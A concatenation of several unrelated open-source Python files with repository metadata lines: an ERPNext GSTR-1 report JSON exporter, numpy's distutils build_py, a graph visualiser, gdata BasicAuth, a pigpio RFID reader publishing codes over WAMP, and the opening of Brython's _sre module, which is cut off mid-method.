                                unidentified_gst_accounts.append(account)
                                unidentified_gst_accounts_invoice.append(parent)
                            continue

                        for item_code, tax_amounts in item_wise_tax_detail.items():
                            tax_rate = tax_amounts[0]
                            if tax_rate:
                                if cgst_or_sgst:
                                    # Report the combined CGST+SGST rate.
                                    tax_rate *= 2
                                    if parent not in self.cgst_sgst_invoices:
                                        self.cgst_sgst_invoices.append(parent)

                                rate_based_dict = self.items_based_on_tax_rate\
                                    .setdefault(parent, {}).setdefault(tax_rate, [])
                                if item_code not in rate_based_dict:
                                    rate_based_dict.append(item_code)
                    except ValueError:
                        # Malformed JSON in item_wise_tax_detail; skip the row.
                        continue
        if unidentified_gst_accounts:
            frappe.msgprint(_("Following accounts might be selected in GST Settings:")
                + "<br>" + "<br>".join(unidentified_gst_accounts), alert=True)

        # Build itemised tax for export invoices where tax table is blank
        for invoice, items in iteritems(self.invoice_items):
            if invoice not in self.items_based_on_tax_rate and invoice not in unidentified_gst_accounts_invoice \
                and frappe.db.get_value(self.doctype, invoice, "export_type") == "Without Payment of Tax":
                self.items_based_on_tax_rate.setdefault(invoice, {}).setdefault(0, items.keys())
    def get_columns(self):
        """Assemble self.columns for the selected type_of_business.

        Final layout: invoice columns + (rate, taxable value) + extras.
        """
        self.tax_columns = [
            {
                "fieldname": "rate",
                "label": "Rate",
                "fieldtype": "Int",
                "width": 60
            },
            {
                "fieldname": "taxable_value",
                "label": "Taxable Value",
                "fieldtype": "Currency",
                "width": 100
            }
        ]
        self.other_columns = []

        if self.filters.get("type_of_business") ==  "B2B":
            self.invoice_columns = [
                {
                    "fieldname": "customer_gstin",
                    "label": "GSTIN/UIN of Recipient",
                    "fieldtype": "Data",
                    "width": 150
                },
                {
                    "fieldname": "customer_name",
                    "label": "Receiver Name",
                    "fieldtype": "Data",
                    "width": 100
                },
                {
                    "fieldname": "invoice_number",
                    "label": "Invoice Number",
                    "fieldtype": "Link",
                    "options": "Sales Invoice",
                    "width": 100
                },
                {
                    "fieldname": "posting_date",
                    "label": "Invoice date",
                    "fieldtype": "Data",
                    "width": 80
                },
                {
                    "fieldname": "invoice_value",
                    "label": "Invoice Value",
                    "fieldtype": "Currency",
                    "width": 100
                },
                {
                    "fieldname": "place_of_supply",
                    "label": "Place Of Supply",
                    "fieldtype": "Data",
                    "width": 100
                },
                {
                    "fieldname": "reverse_charge",
                    "label": "Reverse Charge",
                    "fieldtype": "Data"
                },
                {
                    "fieldname": "gst_category",
                    "label": "Invoice Type",
                    "fieldtype": "Data"
                },
                {
                    "fieldname": "ecommerce_gstin",
                    "label": "E-Commerce GSTIN",
                    "fieldtype": "Data",
                    "width": 120
                }
            ]
            self.other_columns = [
                {
                    "fieldname": "cess_amount",
                    "label": "Cess Amount",
                    "fieldtype": "Currency",
                    "width": 100
                }
            ]
        elif self.filters.get("type_of_business") ==  "B2C Large":
            self.invoice_columns = [
                {
                    "fieldname": "invoice_number",
                    "label": "Invoice Number",
                    "fieldtype": "Link",
                    "options": "Sales Invoice",
                    "width": 120
                },
                {
                    "fieldname": "posting_date",
                    "label": "Invoice date",
                    "fieldtype": "Data",
                    "width": 100
                },
                {
                    "fieldname": "invoice_value",
                    "label": "Invoice Value",
                    "fieldtype": "Currency",
                    "width": 100
                },
                {
                    "fieldname": "place_of_supply",
                    "label": "Place Of Supply",
                    "fieldtype": "Data",
                    "width": 120
                },
                {
                    "fieldname": "ecommerce_gstin",
                    "label": "E-Commerce GSTIN",
                    "fieldtype": "Data",
                    "width": 130
                }
            ]
            self.other_columns = [
                {
                    "fieldname": "cess_amount",
                    "label": "Cess Amount",
                    "fieldtype": "Currency",
                    "width": 100
                }
            ]
        elif self.filters.get("type_of_business") ==  "CDNR-REG":
            # Credit/debit notes issued to registered customers.
            self.invoice_columns = [
                {
                    "fieldname": "customer_gstin",
                    "label": "GSTIN/UIN of Recipient",
                    "fieldtype": "Data",
                    "width": 150
                },
                {
                    "fieldname": "customer_name",
                    "label": "Receiver Name",
                    "fieldtype": "Data",
                    "width": 120
                },
                {
                    "fieldname": "return_against",
                    "label": "Invoice/Advance Receipt Number",
                    "fieldtype": "Link",
                    "options": "Sales Invoice",
                    "width": 120
                },
                {
                    "fieldname": "posting_date",
                    "label": "Invoice/Advance Receipt date",
                    "fieldtype": "Data",
                    "width": 120
                },
                {
                    "fieldname": "invoice_number",
                    "label": "Invoice/Advance Receipt Number",
                    "fieldtype": "Link",
                    "options": "Sales Invoice",
                    "width": 120
                },
                {
                    "fieldname": "reverse_charge",
                    "label": "Reverse Charge",
                    "fieldtype": "Data"
                },
                {
                    # Hidden: used internally by get_invoice_type_for_cdnr.
                    "fieldname": "export_type",
                    "label": "Export Type",
                    "fieldtype": "Data",
                    "hidden": 1
                },
                {
                    "fieldname": "reason_for_issuing_document",
                    "label": "Reason For Issuing document",
                    "fieldtype": "Data",
                    "width": 140
                },
                {
                    "fieldname": "place_of_supply",
                    "label": "Place Of Supply",
                    "fieldtype": "Data",
                    "width": 120
                },
                {
                    "fieldname": "gst_category",
                    "label": "GST Category",
                    "fieldtype": "Data"
                },
                {
                    "fieldname": "invoice_value",
                    "label": "Invoice Value",
                    "fieldtype": "Currency",
                    "width": 120
                }
            ]
            self.other_columns = [
                {
                    "fieldname": "cess_amount",
                    "label": "Cess Amount",
                    "fieldtype": "Currency",
                    "width": 100
                },
                {
                    "fieldname": "pre_gst",
                    "label": "PRE GST",
                    "fieldtype": "Data",
                    "width": 80
                },
                {
                    "fieldname": "document_type",
                    "label": "Document Type",
                    "fieldtype": "Data",
                    "width": 80
                }
            ]
        elif self.filters.get("type_of_business") ==  "B2C Small":
            self.invoice_columns = [
                {
                    "fieldname": "place_of_supply",
                    "label": "Place Of Supply",
                    "fieldtype": "Data",
                    "width": 120
                },
                {
                    "fieldname": "ecommerce_gstin",
                    "label": "E-Commerce GSTIN",
                    "fieldtype": "Data",
                    "width": 130
                }
            ]
            self.other_columns = [
                {
                    "fieldname": "cess_amount",
                    "label": "Cess Amount",
                    "fieldtype": "Currency",
                    "width": 100
                },
                {
                    "fieldname": "type",
                    "label": "Type",
                    "fieldtype": "Data",
                    "width": 50
                }
            ]
        elif self.filters.get("type_of_business") ==  "EXPORT":
            self.invoice_columns = [
                {
                    "fieldname": "export_type",
                    "label": "Export Type",
                    "fieldtype": "Data",
                    "width": 120
                },
                {
                    "fieldname": "invoice_number",
                    "label": "Invoice Number",
                    "fieldtype": "Link",
                    "options": "Sales Invoice",
                    "width": 120
                },
                {
                    "fieldname": "posting_date",
                    "label": "Invoice date",
                    "fieldtype": "Data",
                    "width": 120
                },
                {
                    "fieldname": "invoice_value",
                    "label": "Invoice Value",
                    "fieldtype": "Currency",
                    "width": 120
                },
                {
                    "fieldname": "port_code",
                    "label": "Port Code",
                    "fieldtype": "Data",
                    "width": 120
                },
                {
                    "fieldname": "shipping_bill_number",
                    "label": "Shipping Bill Number",
                    "fieldtype": "Data",
                    "width": 120
                },
                {
                    "fieldname": "shipping_bill_date",
                    "label": "Shipping Bill Date",
                    "fieldtype": "Data",
                    "width": 120
                }
            ]
        # NOTE(review): for any type_of_business not handled above,
        # self.invoice_columns is never assigned and the next line raises
        # AttributeError — confirm all selectable values are covered.
        self.columns = self.invoice_columns + self.tax_columns + self.other_columns
@frappe.whitelist()
def get_json(filters, report_name, data):
    """Convert rendered report rows into the GSTR-1 upload JSON payload.

    filters and data arrive JSON-encoded from the client; the last report
    row (the totals row) is dropped before grouping.
    """
    filters = json.loads(filters)
    report_data = json.loads(data)
    gstin = get_company_gstin_number(filters["company"], filters["company_address"])

    # Filing period: MMYYYY derived from the to_date filter.
    fp = "%02d%s" % (getdate(filters["to_date"]).month, getdate(filters["to_date"]).year)

    gst_json = {"version": "GST2.2.9",
        "hash": "hash", "gstin": gstin, "fp": fp}

    res = {}
    if filters["type_of_business"] == "B2B":
        # Group rows by customer GSTIN, then by invoice number.
        for item in report_data[:-1]:
            res.setdefault(item["customer_gstin"], {}).setdefault(item["invoice_number"],[]).append(item)

        out = get_b2b_json(res, gstin)
        gst_json["b2b"] = out
    elif filters["type_of_business"] == "B2C Large":
        for item in report_data[:-1]:
            res.setdefault(item["place_of_supply"], []).append(item)

        out = get_b2cl_json(res, gstin)
        gst_json["b2cl"] = out
    elif filters["type_of_business"] == "B2C Small":
        out = get_b2cs_json(report_data[:-1], gstin)
        gst_json["b2cs"] = out
    elif filters["type_of_business"] == "EXPORT":
        for item in report_data[:-1]:
            res.setdefault(item["export_type"], []).append(item)

        out = get_export_json(res)
        gst_json["exp"] = out
    elif filters["type_of_business"] == 'CDNR-REG':
        for item in report_data[:-1]:
            res.setdefault(item["customer_gstin"], {}).setdefault(item["invoice_number"],[]).append(item)

        out = get_cdnr_reg_json(res, gstin)
        gst_json["cdnr"] = out

    return {
        'report_name': report_name,
        'report_type': filters['type_of_business'],
        'data': gst_json
    }
def get_b2b_json(res, gstin):
    """Build the `b2b` section: invoices grouped per recipient GSTIN."""
    inv_type, out = {"Registered Regular": "R", "Deemed Export": "DE", "URD": "URD", "SEZ": "SEZ"}, []
    for gst_in in res:
        b2b_item, inv = {"ctin": gst_in, "inv": []}, []
        if not gst_in: continue
        for number, invoice in iteritems(res[gst_in]):
            if not invoice[0]["place_of_supply"]:
                frappe.throw(_("""{0} not entered in Invoice {1}.
                    Please update and try again""").format(frappe.bold("Place Of Supply"),
                    frappe.bold(invoice[0]['invoice_number'])))

            inv_item = get_basic_invoice_detail(invoice[0])
            # "pos" is the 2-digit state code prefix of place_of_supply.
            inv_item["pos"] = "%02d" % int(invoice[0]["place_of_supply"].split('-')[0])
            inv_item["rchrg"] = invoice[0]["reverse_charge"]
            inv_item["inv_typ"] = inv_type.get(invoice[0].get("gst_category", ""),"")

            # Skip invoices whose place-of-supply code resolves to 00.
            if inv_item["pos"]=="00": continue
            inv_item["itms"] = []

            for item in invoice:
                inv_item["itms"].append(get_rate_and_tax_details(item, gstin))

            inv.append(inv_item)

        if not inv: continue
        b2b_item["inv"] = inv
        out.append(b2b_item)

    return out
def get_b2cs_json(data, gstin):
    """Build the `b2cs` section from pre-aggregated B2C Small rows."""
    company_state_number = gstin[0:2]

    out = []
    for d in data:
        if not d.get("place_of_supply"):
            frappe.throw(_("""{0} not entered in some invoices.
                Please update and try again""").format(frappe.bold("Place Of Supply")))

        pos = d.get('place_of_supply').split('-')[0]
        tax_details = {}

        rate = d.get('rate', 0)
        tax = flt((d["taxable_value"]*rate)/100.0, 2)

        # Same state as the company: split into CGST+SGST, else IGST.
        if company_state_number == pos:
            tax_details.update({"camt": flt(tax/2.0, 2), "samt": flt(tax/2.0, 2)})
        else:
            tax_details.update({"iamt": tax})

        inv = {
            "sply_ty": "INTRA" if company_state_number == pos else "INTER",
            "pos": pos,
            "typ": d.get('type'),
            "txval": flt(d.get('taxable_value'), 2),
            "rt": rate,
            "iamt": flt(tax_details.get('iamt'), 2),
            "camt": flt(tax_details.get('camt'), 2),
            "samt": flt(tax_details.get('samt'), 2),
            "csamt": flt(d.get('cess_amount'), 2)
        }

        # E-commerce supplies additionally carry the operator's GSTIN.
        if d.get('type') == "E" and d.get('ecommerce_gstin'):
            inv.update({
                "etin": d.get('ecommerce_gstin')
            })

        out.append(inv)

    return out
def get_b2cl_json(res, gstin):
    """Build the `b2cl` section: invoices grouped per place of supply."""
    out = []
    for pos in res:
        if not pos:
            frappe.throw(_("""{0} not entered in some invoices.
                Please update and try again""").format(frappe.bold("Place Of Supply")))

        b2cl_item, inv = {"pos": "%02d" % int(pos.split('-')[0]), "inv": []}, []

        for row in res[pos]:
            inv_item = get_basic_invoice_detail(row)
            # CBW = supply made from a customs bonded warehouse.
            if row.get("sale_from_bonded_wh"):
                inv_item["inv_typ"] = "CBW"

            inv_item["itms"] = [get_rate_and_tax_details(row, gstin)]

            inv.append(inv_item)

        b2cl_item["inv"] = inv
        out.append(b2cl_item)

    return out
def get_export_json(res):
    """Build the `exp` section: invoices grouped per export type."""
    out = []
    for exp_type in res:
        exp_item, inv = {"exp_typ": exp_type, "inv": []}, []
        for row in res[exp_type]:
            inv_item = get_basic_invoice_detail(row)
            # Exports never carry IGST/cess here; only rate and taxable value.
            inv_item["itms"] = [{
                "txval": flt(row["taxable_value"], 2),
                "rt": row["rate"] or 0,
                "iamt": 0,
                "csamt": 0
            }]

            inv.append(inv_item)

        exp_item["inv"] = inv
        out.append(exp_item)

    return out
def get_cdnr_reg_json(res, gstin):
    """Build the `cdnr` section: credit/debit notes grouped per recipient GSTIN."""
    out = []
    for gst_in in res:
        cdnr_item, inv = {"ctin": gst_in, "nt": []}, []
        if not gst_in: continue
        for number, invoice in iteritems(res[gst_in]):
            if not invoice[0]["place_of_supply"]:
                frappe.throw(_("""{0} not entered in Invoice {1}.
                    Please update and try again""").format(frappe.bold("Place Of Supply"),
                    frappe.bold(invoice[0]['invoice_number'])))

            inv_item = {
                "nt_num": invoice[0]["invoice_number"],
                "nt_dt": getdate(invoice[0]["posting_date"]).strftime('%d-%m-%Y'),
                "val": abs(flt(invoice[0]["invoice_value"])),
                # "C" (credit note) or "D" (debit note), set in get_data().
                "ntty": invoice[0]["document_type"],
                "pos": "%02d" % int(invoice[0]["place_of_supply"].split('-')[0]),
                "rchrg": invoice[0]["reverse_charge"],
                "inv_type": get_invoice_type_for_cdnr(invoice[0])
            }

            inv_item["itms"] = []

            for item in invoice:
                inv_item["itms"].append(get_rate_and_tax_details(item, gstin))

            inv.append(inv_item)

        if not inv: continue
        cdnr_item["nt"] = inv
        out.append(cdnr_item)

    return out
def get_invoice_type_for_cdnr(row):
    """Map a CDNR row's GST category to the GSTR-1 note invoice type.

    Returns 'SEWP'/'SEWOP' for SEZ (with/without payment of tax),
    'DE' for Deemed Export and 'R' for Registered Regular. These three
    categories are the only ones selected by the CDNR-REG query.
    """
    if row.get('gst_category') == 'SEZ':
        if row.get('export_type') == 'WPAY':
            invoice_type = 'SEWP'
        else:
            invoice_type = 'SEWOP'
    elif row.get('gst_category') == 'Deemed Export':
        # Bug fix: this previously assigned `row.invoice_type`, leaving the
        # local `invoice_type` unbound and raising UnboundLocalError at the
        # return statement for every Deemed Export note.
        invoice_type = 'DE'
    elif row.get('gst_category') == 'Registered Regular':
        invoice_type = 'R'
    return invoice_type
def get_basic_invoice_detail(row):
    """Return the invoice fields shared by every GSTR-1 JSON section:
    number ("inum"), date ("idt", dd-mm-yyyy) and value ("val")."""
    invoice_date = getdate(row["posting_date"])
    return {
        "inum": row["invoice_number"],
        "idt": invoice_date.strftime('%d-%m-%Y'),
        "val": flt(row["invoice_value"], 2)
    }
def get_rate_and_tax_details(row, gstin):
    """Return the GSTR-1 item entry {"num": ..., "itm_det": ...} for one row.

    Tax is split into CGST+SGST when the customer is in the company's own
    state (first two GSTIN digits match), otherwise reported as IGST.
    """
    itm_det = {"txval": flt(row["taxable_value"], 2),
        "rt": row["rate"],
        "csamt": (flt(row.get("cess_amount"), 2) or 0)
    }

    # Item serial number: 1 for zero-rated rows, else "<rate>01"
    # (e.g. rate 18 -> 1801).
    num = 1 if not row["rate"] else "%d%02d" % (row["rate"], 1)

    rate = row.get("rate") or 0

    # calculate tax amount added
    tax = flt((row["taxable_value"]*rate)/100.0, 2)
    # (removed leftover debug output: frappe.errprint([tax, tax/2]))
    if row.get("customer_gstin") and gstin[0:2] == row["customer_gstin"][0:2]:
        itm_det.update({"camt": flt(tax/2.0, 2), "samt": flt(tax/2.0, 2)})
    else:
        itm_det.update({"iamt": tax})

    return {"num": int(num), "itm_det": itm_det}
def get_company_gstin_number(company, address=None, all_gstins=False):
    """Resolve the company's GSTIN(s).

    Prefers the explicitly given address; otherwise looks up addresses
    linked to the company. With all_gstins=True the full list is returned,
    else the first match. Throws when nothing valid is found.
    """
    gstin = ''

    if address:
        gstin = frappe.db.get_value("Address", address, "gstin")

    if not gstin:
        filters = [
            ["is_your_company_address", "=", 1],
            ["Dynamic Link", "link_doctype", "=", "Company"],
            ["Dynamic Link", "link_name", "=", company],
            ["Dynamic Link", "parenttype", "=", "Address"],
        ]
        gstin = frappe.get_all("Address", filters=filters, pluck="gstin")
        if gstin and not all_gstins:
            gstin = gstin[0]

    if not gstin:
        address = frappe.bold(address) if address else ""
        frappe.throw(_("Please set valid GSTIN No. in Company Address {} for company {}").format(
            address, frappe.bold(company)
        ))

    return gstin
@frappe.whitelist()
def download_json_file():
    ''' download json content in a file '''
    # Payload (report_name, report_type, data) comes from the client form
    # submission; the response is served as a JSON file attachment.
    data = frappe._dict(frappe.local.form_dict)
    frappe.response['filename'] = frappe.scrub("{0} {1}".format(data['report_name'], data['report_type'])) + '.json'
    frappe.response['filecontent'] = data['data']
    frappe.response['content_type'] = 'application/json'
    frappe.response['type'] = 'download'
| gpl-3.0 |
BigDataforYou/movie_recommendation_workshop_1 | big_data_4_you_demo_1/venv/lib/python2.7/site-packages/numpy/distutils/command/build_py.py | 264 | 1210 | from __future__ import division, absolute_import, print_function
from distutils.command.build_py import build_py as old_build_py
from numpy.distutils.misc_util import is_string
class build_py(old_build_py):
    """distutils build_py extended to pick up modules generated by build_src."""

    def run(self):
        # If build_src generated modules but no packages were configured,
        # derive the package list from the generated-module mapping.
        build_src = self.get_finalized_command('build_src')
        if build_src.py_modules_dict and self.packages is None:
            self.packages = list(build_src.py_modules_dict)
        old_build_py.run(self)

    def find_package_modules(self, package, package_dir):
        modules = old_build_py.find_package_modules(self, package, package_dir)

        # Also include any *.py files that build_src generated for this package.
        build_src = self.get_finalized_command('build_src')
        generated = build_src.py_modules_dict.get(package, [])
        return modules + generated

    def find_modules(self):
        # Temporarily hide non-string entries (build_src tuples) from the
        # base implementation, then restore the original list.
        saved_modules = self.py_modules[:]
        self.py_modules[:] = [entry for entry in saved_modules if is_string(entry)]
        modules = old_build_py.find_modules(self)
        self.py_modules[:] = saved_modules
        return modules
# XXX: Fix find_source_files for item in py_modules such that item is 3-tuple
# and item[2] is source file.
| mit |
kgilbert-cmu/bigs | families/visualize.py | 1 | 1098 | from optparse import OptionParser
import sys
import graph
def init_parser():
    """Parse the command line and return the populated options object."""
    parser = OptionParser()
    parser.add_option("-f", "--file", dest="File", type="string", help="")
    parser.add_option("-o", "--output", dest="Output", type="string", help="")
    # parse_args reads sys.argv; the positional arguments are unused.
    options, _args = parser.parse_args()
    return options
def main():
    # Python 2 script: read "parent:child1,child2,..." records from the
    # input file, build the family mapping and render it via graph.Graph.
    options = init_parser()
    if options.File == None:
        print "Error: Did not specify input file."
        sys.exit(1)
    if options.Output == None:
        print "Warning: Did not specify output file. Defaulting to 'image.pdf'"
        options.Output = "image"

    # One record per line.
    pairs = []
    with open(options.File, 'r') as input_file:
        for line in input_file:
            pairs.append(line.strip())

    # mapping: {parent: [children]}; parents may appear on multiple lines.
    mapping = {}
    for p in pairs:
        (parent, children) = p.split(":")
        if parent not in mapping:
            mapping[parent] = []
        mapping[parent].extend(children.split(","))

    image = graph.Graph(mapping)
    image.render(options.Output)
# Run only when executed as a script, not on import.
if __name__ == "__main__":
    main()
| mit |
barbarubra/Don-t-know-What-i-m-doing. | python/gdata/src/atom/auth.py | 297 | 1199 | #!/usr/bin/env python
#
# Copyright (C) 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This module is used for version 2 of the Google Data APIs.
__author__ = 'j.s@google.com (Jeff Scudder)'
import base64
class BasicAuth(object):
    """Sets the Authorization header as defined in RFC1945.

    Credentials are encoded with base64.b64encode rather than the old
    base64.encodestring: encodestring inserts a newline every 76 output
    characters, which would corrupt the header for long user/password
    pairs, and it was removed from the stdlib in Python 3.9.
    """

    def __init__(self, user_id, password):
        raw = '%s:%s' % (user_id, password)
        # b64encode emits no embedded newlines; decode to text for the header.
        self.basic_cookie = base64.b64encode(raw.encode('utf-8')).decode('ascii')

    def modify_request(self, http_request):
        """Attach the Basic credentials to the request's headers."""
        http_request.headers['Authorization'] = 'Basic %s' % self.basic_cookie

    # Backwards-compatible alias kept for existing callers.
    ModifyRequest = modify_request
class NoAuth(object):
    """No-op auth handler: leaves the request unmodified."""

    def modify_request(self, http_request):
        # Intentionally does nothing.
        pass
| apache-2.0 |
filemakergarage/zeroclient | f1/s/docker/rfidreader.py | 1 | 4418 | # f1/s/docker/rfidreader.py
# import time
from f1.s.docker.f1time import Time
from f1.s.docker.base_device import BaseDevice
from autobahn.wamp.message import Published
from twisted.internet.defer import inlineCallbacks
from autobahn.twisted.util import sleep
from autobahn.twisted.wamp import ApplicationSession
from autobahn.wamp.types import PublishOptions
class Reader(BaseDevice):
    """WAMP component reading a two-wire (data/clock) RFID reader on GPIO.

    Decoded bit strings are published to 'com.zc.auth_code'. Without GPIO
    hardware, canned test values are published instead.
    """

    def __init__(self, architecture, platform, session_id, args):
        super().__init__(architecture, platform, session_id)
        # args: [direction, reader id, data GPIO pin, clock GPIO pin]
        self.direction = args[0]
        self.id = args[1]
        self.data_pin = int(args[2])
        self.clock_pin = int(args[3])
        # Watchdog timeout (ms) on the clock pin, used to detect the end
        # of a code burst in _cbf.
        self.bit_timeout = 6
        # Canned bit strings published when running without GPIO hardware
        # (note the implicit string concatenation).
        self.test = ['11010000011100110000001000000100001000010000110000100000000'
                     '10000110000000011000011001100000010000001010001111101000',
                     '11010100001010110000001000000100001000010000100001010000000'
                     '11001100001001001000011001100001010100001100111111110000']

    @inlineCallbacks
    def onJoin(self, details):
        """Session joined: start decoding on hardware, else emit test data."""
        super().onJoin(details)
        if self.has_gpio:
            try:
                self.decode()
                # Keep the session alive while GPIO callbacks do the work.
                while True:
                    yield sleep(3)
            except Exception as exc:
                print('rfidreader.Decoder', exc)
                self.publish('com.zc.log', exc.__cause__)
                # return exc
            finally:
                self.cancel()
        elif not self.has_gpio:  # TODO and testing is True
            yield self.generate_test_values()

    @inlineCallbacks
    def generate_test_values(self):
        """Publish the two canned auth codes (no hardware required)."""
        # while self.mission_go is False:
        #     time.sleep(1)
        try:
            # generate test values
            value = self.make_value(self.test[0])
            utc = Time.utc_now()
            result = {'code': value, 'utc': utc, 'direction': self.direction, 'id': self.id}
            self.publish('com.zc.auth_code', result)
            print(result)
            yield sleep(2)
            value = self.make_value(self.test[1])
            utc = Time.utc_now()
            result = {'code': value, 'utc': utc, 'direction': self.direction, 'id': self.id}
            self.publish('com.zc.auth_code', result)
            print(result)
            yield sleep(2)
        except Exception as exc:
            self.publish('com.zc.log', exc.__cause__)
            return exc

    def decode(self):
        """Configure the GPIO pins and register the edge callbacks.

        Assumes self.pi is a connected pigpio.pi() instance set up by the
        base class — TODO confirm.
        """
        print('decode...')
        import pigpio
        self.in_code = False
        self.pi.set_mode(self.data_pin, pigpio.INPUT)
        self.pi.set_mode(self.clock_pin, pigpio.INPUT)
        self.pi.set_pull_up_down(self.data_pin, pigpio.PUD_UP)
        self.pi.set_pull_up_down(self.clock_pin, pigpio.PUD_UP)
        self.cb_0 = self.pi.callback(self.data_pin, pigpio.EITHER_EDGE, self._cbf)
        self.cb_1 = self.pi.callback(self.clock_pin, pigpio.FALLING_EDGE, self._cbf)

    def _cbf(self, gpio, level, tick):
        """pigpio edge/watchdog callback: accumulate bits, emit on timeout.

        level < pigpio.TIMEOUT means a real edge; pigpio.TIMEOUT is the
        clock-pin watchdog firing after bit_timeout ms of silence, which
        marks the end of a code.
        """
        import pigpio
        if level < pigpio.TIMEOUT:
            if not self.in_code:
                # First edge of a new code: reset state and arm the watchdog.
                self.data_level = 0
                self.bits = 0
                self.in_code = True
                self.code_timeout = 0
                self.pi.set_watchdog(self.clock_pin, self.bit_timeout)
            else:
                if gpio == self.data_pin:
                    # Remember the current data-line level; it is sampled
                    # on the next clock edge.
                    self.data_level = level
                else:  # clock rising edge
                    # NOTE(review): self.bits starts as int 0 and becomes a
                    # string here, so every code begins with a literal "0".
                    self.bits = int(self.bits)
                    self.bits = "{}{}".format(self.bits, self.data_level)
                    self.code_timeout = 0
        else:
            # Watchdog fired: the burst is over, publish the collected bits.
            if self.in_code:
                self.code_timeout = 1
                self.pi.set_watchdog(self.clock_pin, 0)
                self.in_code = False
                value = self.make_value(self.bits)
                utc = Time.utc_now()
                result = {'code': value, 'utc': utc, 'id': self.id, 'direction': self.direction}
                self.publish('com.zc.auth_code', result)
                # self.send_auth_code_inline(result)

    def cancel(self):
        """Detach GPIO callbacks and close the pigpio connection."""
        if self.cb_0:
            self.cb_0.cancel()
        if self.cb_1:
            self.cb_1.cancel()
        if self.pi is not None:
            self.pi.stop()

    @staticmethod
    def make_value(bits):
        # Sanity-check the code length. NOTE(review): `assert` is stripped
        # under `python -O`, so this is not real input validation.
        length = len(str(bits))
        assert length < 60, 'Error: len(auth_code) > 60 : {}'.format(length)
        return bits
| mit |
40223234/w16b_test | static/Brython3.1.3-20150514-095342/Lib/_sre.py | 622 | 51369 | # NOT_RPYTHON
"""
A pure Python reimplementation of the _sre module from CPython 2.4
Copyright 2005 Nik Haldimann, licensed under the MIT license
This code is based on material licensed under CNRI's Python 1.6 license and
copyrighted by: Copyright (c) 1997-2001 by Secret Labs AB
"""
MAXREPEAT = 2147483648
#import array
import operator, sys
from sre_constants import ATCODES, OPCODES, CHCODES
from sre_constants import SRE_INFO_PREFIX, SRE_INFO_LITERAL
from sre_constants import SRE_FLAG_UNICODE, SRE_FLAG_LOCALE
import sys
# Identifying as _sre from Python 2.3 or 2.4
#if sys.version_info[:2] >= (2, 4):
MAGIC = 20031017
#else:
# MAGIC = 20030419
# In _sre.c this is bytesize of the code word type of the C implementation.
# There it's 2 for normal Python builds and more for wide unicode builds (large
# enough to hold a 32-bit UCS-4 encoded character). Since here in pure Python
# we only see re bytecodes as Python longs, we shouldn't have to care about the
# codesize. But sre_compile will compile some stuff differently depending on the
# codesize (e.g., charsets).
# starting with python 3.3 CODESIZE is 4
#if sys.maxunicode == 65535:
# CODESIZE = 2
#else:
CODESIZE = 4
copyright = "_sre.py 2.4c Copyright 2005 by Nik Haldimann"
def getcodesize():
    """Return the byte size of one SRE code word (module constant CODESIZE)."""
    return CODESIZE
def compile(pattern, flags, code, groups=0, groupindex={}, indexgroup=[None]):
    """Compiles (or rather just converts) a pattern descriptor to a SRE_Pattern
    object. Actual compilation to opcodes happens in sre_compile."""
    # Intentionally shadows the builtin `compile`: this module mirrors the
    # public API of the C `_sre` extension module.
    return SRE_Pattern(pattern, flags, code, groups, groupindex, indexgroup)
def getlower(char_ord, flags):
    """Return the lower-case code point for char_ord, honouring the flags.

    Lower-casing is applied for ASCII always, for any code point under
    SRE_FLAG_UNICODE, and for Latin-1 (< 256) under SRE_FLAG_LOCALE;
    otherwise char_ord is returned unchanged.
    """
    is_ascii = char_ord < 128
    unicode_ok = bool(flags & SRE_FLAG_UNICODE)
    locale_ok = bool(flags & SRE_FLAG_LOCALE) and char_ord < 256
    if not (is_ascii or unicode_ok or locale_ok):
        return char_ord
    return ord(chr(char_ord).lower())
class SRE_Pattern:
    def __init__(self, pattern, flags, code, groups=0, groupindex={}, indexgroup=[None]):
        # NOTE(review): mutable default arguments are shared across calls;
        # harmless here only as long as callers never mutate them.
        self.pattern = pattern
        self.flags = flags
        self.groups = groups
        self.groupindex = groupindex # Maps group names to group indices
        self._indexgroup = indexgroup # Maps indices to group names
        self._code = code  # compiled opcode list produced by sre_compile
def match(self, string, pos=0, endpos=sys.maxsize):
"""If zero or more characters at the beginning of string match this
regular expression, return a corresponding MatchObject instance. Return
None if the string does not match the pattern."""
state = _State(string, pos, endpos, self.flags)
if state.match(self._code):
return SRE_Match(self, state)
return None
def search(self, string, pos=0, endpos=sys.maxsize):
"""Scan through string looking for a location where this regular
expression produces a match, and return a corresponding MatchObject
instance. Return None if no position in the string matches the
pattern."""
state = _State(string, pos, endpos, self.flags)
if state.search(self._code):
return SRE_Match(self, state)
else:
return None
    def findall(self, string, pos=0, endpos=sys.maxsize):
        """Return a list of all non-overlapping matches of pattern in string."""
        matchlist = []
        state = _State(string, pos, endpos, self.flags)
        while state.start <= state.end:
            state.reset()
            state.string_position = state.start
            if not state.search(self._code):
                break
            match = SRE_Match(self, state)
            # 0 or 1 groups: collect a single string; otherwise a tuple of
            # groups with unmatched groups reported as "".
            if self.groups == 0 or self.groups == 1:
                item = match.group(self.groups)
            else:
                item = match.groups("")
            matchlist.append(item)
            # Advance by one on empty matches so the scan always progresses.
            if state.string_position == state.start:
                state.start += 1
            else:
                state.start = state.string_position
        return matchlist
def _subx(self, template, string, count=0, subn=False):
filter = template
if not callable(template) and "\\" in template:
# handle non-literal strings ; hand it over to the template compiler
#import sre #sre was renamed to re
#fix me brython
#print("possible issue at _sre.py line 116")
import re as sre
filter = sre._subx(self, template)
state = _State(string, 0, sys.maxsize, self.flags)
sublist = []
n = last_pos = 0
while not count or n < count:
state.reset()
state.string_position = state.start
if not state.search(self._code):
break
if last_pos < state.start:
sublist.append(string[last_pos:state.start])
if not (last_pos == state.start and
last_pos == state.string_position and n > 0):
# the above ignores empty matches on latest position
if callable(filter):
sublist.append(filter(SRE_Match(self, state)))
else:
sublist.append(filter)
last_pos = state.string_position
n += 1
if state.string_position == state.start:
state.start += 1
else:
state.start = state.string_position
if last_pos < state.end:
sublist.append(string[last_pos:state.end])
item = "".join(sublist)
if subn:
return item, n
else:
return item
def sub(self, repl, string, count=0):
"""Return the string obtained by replacing the leftmost non-overlapping
occurrences of pattern in string by the replacement repl."""
return self._subx(repl, string, count, False)
def subn(self, repl, string, count=0):
